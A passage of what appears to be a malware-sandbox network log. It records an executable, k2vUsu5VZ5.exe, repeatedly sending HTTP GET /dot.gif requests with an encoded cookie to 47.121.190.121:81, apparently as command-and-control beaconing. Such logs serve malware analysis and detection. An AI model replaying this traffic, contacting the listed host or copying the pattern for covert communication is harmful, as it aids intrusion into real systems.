              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:49.317629099 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:49 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              99192.168.2.45010147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:49.504554987 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              100192.168.2.45010247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:53.409832001 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:54.443525076 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:54 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              101192.168.2.45010347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:54.562570095 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:55.532665014 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:55 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              102192.168.2.45010447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:55.656450987 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:56.750638008 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:56 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              103192.168.2.45010547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:56.860140085 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:58.599596977 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:57 GMT
              Content-Type: application/octet-stream
              Content-Length: 0
              Jan 9, 2025 18:28:58.600266933 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:57 GMT
              Content-Type: application/octet-stream
              Content-Length: 0
              Jan 9, 2025 18:28:58.601686954 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:57 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              104192.168.2.45010647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:58.723535061 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:28:59.666361094 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:28:59 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              105192.168.2.45010747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:28:59.784605980 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:00.740643978 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:00 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              106192.168.2.45010847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:00.861505985 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:01.822998047 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:01 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              107192.168.2.45010947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:02.017900944 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:02.993954897 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:02 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              108192.168.2.45011047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:03.108571053 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:04.080018997 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:03 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              109192.168.2.45011147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:04.203457117 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:05.165469885 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:05 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              110192.168.2.45011247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:05.286977053 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:06.251194000 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:06 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              111192.168.2.45011347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:06.375394106 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:07.326994896 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:07 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              112192.168.2.45011447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:07.458906889 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              113192.168.2.45011547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:11.564615965 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:12.553524017 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:12 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              114192.168.2.45011647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:12.676637888 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:13.618613958 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:13 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              115192.168.2.45011747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:13.734033108 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:14.716583014 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:14 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              116192.168.2.45011847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:14.851392031 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:15.814443111 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:15 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              117192.168.2.45011947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:15.937447071 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:16.893337965 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:16 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              118192.168.2.45012047.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:17.018399954 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:18.004888058 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:17 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              119192.168.2.45012147.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:18.125160933 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:19.163203955 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:19 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              120192.168.2.45012247.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:19.284792900 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:20.243913889 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:20 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              121192.168.2.45012347.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:20.358978987 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:21.320697069 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:21 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              122192.168.2.45012447.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:21.443793058 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:22.513612986 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:22 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              123192.168.2.45012547.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:22.634139061 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:23.620271921 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:23 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              124192.168.2.45012647.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:23.733658075 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:24.674144983 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:24 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              125192.168.2.45012747.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:24.800683022 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:25.755846977 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:25 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              126192.168.2.45012847.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:25.905774117 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:26.889990091 CET114INHTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:26 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              127192.168.2.45012947.121.190.121817148C:\Users\user\Desktop\k2vUsu5VZ5.exe
              TimestampBytes transferredDirectionData
              Jan 9, 2025 18:29:27.000641108 CET386OUTGET /dot.gif HTTP/1.1
              Accept: */*
